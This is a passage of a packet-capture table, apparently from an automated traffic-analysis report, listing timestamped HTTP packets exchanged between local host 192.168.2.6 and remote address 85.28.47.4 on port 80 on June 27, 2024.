                                                                Jun 27, 2024 05:58:04.938977957 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:04.938993931 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:04.939003944 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:04.939017057 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:04.939053059 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:04.939142942 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:04.939188004 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:04.939548969 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:04.939558983 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:04.939604044 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:04.943701029 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:04.943754911 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:04.943779945 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:04.943816900 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:04.944071054 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:04.944081068 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:04.944089890 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:04.944117069 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:04.944130898 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:04.944153070 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:04.944185019 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:04.944211960 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:04.944222927 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:04.944250107 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:04.944276094 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:04.944329023 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:04.944374084 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:04.944778919 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:04.944830894 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:04.944853067 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:04.944864988 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:04.944890976 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:04.944912910 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:04.944976091 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:04.945015907 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:04.945044041 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:04.945091009 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:04.945760965 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:04.945772886 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:04.945782900 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:04.945811033 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:04.945843935 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:04.945878983 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:04.945889950 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:04.945945978 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.021250010 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.021342039 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.021344900 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.021356106 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.021373034 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.021384001 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.021393061 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.021394014 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.021408081 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.021435022 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.021481991 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.021692038 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.021745920 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.025835037 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.025886059 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.025904894 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.025917053 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.025949001 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.025985003 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.026119947 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.026132107 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.026143074 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.026170969 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.026204109 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.026345015 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.026392937 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.026439905 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.026453018 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.026489973 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.026583910 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.026595116 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.026606083 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.026627064 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.026659966 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.030953884 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.031009912 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.031013012 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.031028986 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.031069994 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.031210899 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.031223059 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.031234026 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.031245947 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.031258106 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.031286001 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.031464100 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.031537056 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.031542063 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.031548977 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.031577110 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.031606913 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.031712055 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.031723976 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.031733990 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.031748056 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.031758070 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.031793118 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.031960964 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.031971931 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.031981945 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.031996012 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.032002926 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.032027960 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.032059908 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.032530069 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.032576084 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.032604933 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.032617092 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.032649994 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.032779932 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.032792091 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.032803059 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.032814980 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.032825947 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.032850027 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.033081055 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.033134937 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.033169985 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.033216000 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.033216000 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.033230066 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.033258915 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.033276081 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.033348083 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.033390045 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.103542089 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.103667974 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.103703976 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.103723049 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.103734970 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.103744984 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.103764057 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.103791952 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.108052015 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.108118057 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.108144045 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.108159065 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.108191013 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.108222961 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.108350039 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.108362913 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.108393908 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.108412027 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.112689018 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.112749100 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.112777948 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.112790108 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.112819910 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.112838030 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.112899065 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.112925053 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.112941027 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.112970114 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.113049030 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.113060951 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.113074064 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.113100052 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.113136053 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.113303900 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.113315105 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.113327026 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.113338947 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.113353968 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.113389015 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.113563061 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.113574028 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.113591909 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.113603115 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.113614082 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.113620996 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.113636971 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.113661051 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.113920927 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.113967896 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.114006996 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.114017010 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.114061117 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.114171028 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.114181042 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.114192009 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.114197969 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.114217997 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.114254951 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.117808104 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.117860079 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.117870092 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.117887974 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.117908955 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.117923975 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.118088007 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.118099928 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.118112087 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.118139029 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.118174076 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.118268967 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.118279934 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.118293047 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.118323088 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.118345976 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.118515015 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.118525028 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.118535995 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.118546963 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.118557930 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.118558884 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.118568897 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.118581057 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.118596077 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.118627071 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.119054079 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.119066000 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.119076967 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.119090080 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.119097948 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.119137049 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.119424105 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.119435072 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.119446039 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.119457006 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.119467974 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.119472027 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.119496107 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.119518995 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.119687080 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.119698048 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.119708061 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.119728088 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.119735956 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.119745016 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.119756937 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.119771957 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.119791031 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.119822979 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.120189905 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.120201111 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.120212078 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.120223999 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.120234013 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.120242119 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.120245934 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.120275974 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.120299101 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.120614052 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.120625973 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.120635986 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.120647907 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.120657921 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.120666027 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.120672941 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.120703936 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.120724916 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.120979071 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.121026993 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.121057034 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.121068954 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.121102095 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.121275902 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.121325016 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.121340036 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.121351957 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.121362925 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.121373892 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.121381044 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.121409893 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.121601105 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.121612072 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.121624947 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.121643066 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.121650934 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.121653080 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.121664047 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.121670961 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.121675968 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.121686935 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.121707916 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.121746063 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.190538883 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.190606117 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.190618992 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.190623045 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.190671921 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.190831900 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.190843105 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.190854073 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.190866947 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.190877914 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.190900087 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.190931082 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.191297054 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.191353083 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.195209026 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.195271969 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.195271969 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.195281982 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.195333958 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.195439100 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.195450068 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.195466995 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.195477962 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.195485115 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.195516109 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.195817947 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.195828915 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.195839882 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.195854902 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.195863962 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.195888042 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.195933104 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.199860096 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.199913979 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.199920893 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.199923992 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.199953079 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.199974060 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.200112104 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.200123072 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.200133085 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.200144053 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.200149059 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.200222015 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.200392008 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.200402021 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.200411081 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.200422049 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.200438976 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.200479031 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.200673103 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.200683117 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.200694084 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.200706005 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.200716019 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.200753927 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.200922966 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.200967073 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.201055050 CEST804971185.28.47.4192.168.2.6
